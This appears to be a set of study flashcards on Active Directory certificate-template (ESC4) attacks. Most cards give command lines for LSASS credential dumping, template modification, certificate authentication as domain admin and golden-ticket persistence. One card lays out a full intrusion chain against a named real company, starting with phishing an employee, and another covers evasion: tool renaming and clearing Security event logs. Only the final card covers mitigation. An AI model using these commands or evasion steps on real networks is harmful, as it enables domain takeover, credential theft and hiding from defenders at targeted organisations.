ESC4

Question 1

HandleKatz

Answer 1

Stealthy LSASS credential dumper using handle duplication.

Command: HandleKatz.exe –pid [LSASS_PID] –dumpname C:\lsass.dmp

Use Case: Dump credentials without triggering OpenProcess detection.

Question 2

SharpKatz

Answer 2

C# tool for credential dumping and Kerberos attacks (Mimikatz alternative).

Commands:

SharpKatz.exe –Command logonpasswords

SharpKatz.exe –Command golden –User fakeadmin …

Question 3

Certify

Answer 3

Enumerates/modifies AD CS templates and requests certificates.

Commands:

Certify.exe find /vulnerable (Find ESC4 templates)

Certify.exe modify /template:HelpdeskTemplate /altname:admin@domain.com

Question 4

Certipy

Answer 4

Python-based tool for AD CS exploitation.

Commands:

certipy req … (Request certificate)

certipy auth -pfx admin.pfx (Authenticate with certificate)

Question 5

Impacket

Answer 5

Python framework for network attacks.

Tools:

secretsdump.py (Dump hashes with Kerberos tickets)

ticketer.py (Generate Golden Tickets)

Question 6

Credential Dumping (Stealthy)

Answer 6

Method: Use HandleKatz or rundll32 comsvcs.dll to dump LSASS.

Detection Evasion: Avoid direct LSASS handles; parse dumps offline with pypykatz.

Question 7

Template Modification (ESC4)

Answer 7

Steps:

Find templates with WriteDacl using Certify or BloodHound.

Modify EKU/SAN settings to allow privilege escalation.

Command: Certify.exe modify /template:…

Question 8

Certificate Authentication

Answer 8

Process: Use certipy auth or SharpKatz to request a TGT with a certificate.

Result: Authenticate as DA without password.

Question 9

Golden Ticket Persistence

Answer 9

Tools: SharpKatz or ticketer.py.

Key: Requires krbtgt hash (extracted via secretsdump.py).

Question 10

ESC4 Exploit Chain (Assume Breach)

Answer 10

Initial Access: Phish a low-privileged user (e.g., jdoe@walgreens.com).

Credential Dumping: Use HandleKatz to extract credentials from LSASS.

Recon: Enumerate AD CS servers/templates with Certify.exe find /vulnerable.

Modify Template: Alter HelpdeskTemplate to enable SAN + Client Auth.

Enroll Certificate: Request cert with certipy req or Certify.exe request.

Authenticate: Use certipy auth to get a TGT as administrator.

Dump Hashes: secretsdump.py -k -no-pass to extract krbtgt hash.

Golden Ticket: Create persistence with ticketer.py or SharpKatz.

Cover Tracks: Revert template changes and clear logs.

Question 11

Evading Detection

Answer 11

Use certreq.exe (native) instead of Certify for enrollment.

Rename tools (e.g., SharpKatz.exe → WalgreenUpdater.exe).

Clear logs: wevtutil cl Security.

Question 12

Mitigating ESC4

Answer 12

Restrict Permissions: Remove WriteDacl on templates.

Monitor: Alert on Event ID 5136 (AD object modifications).

Harden Templates: Disable Client Authentication EKU where unnecessary.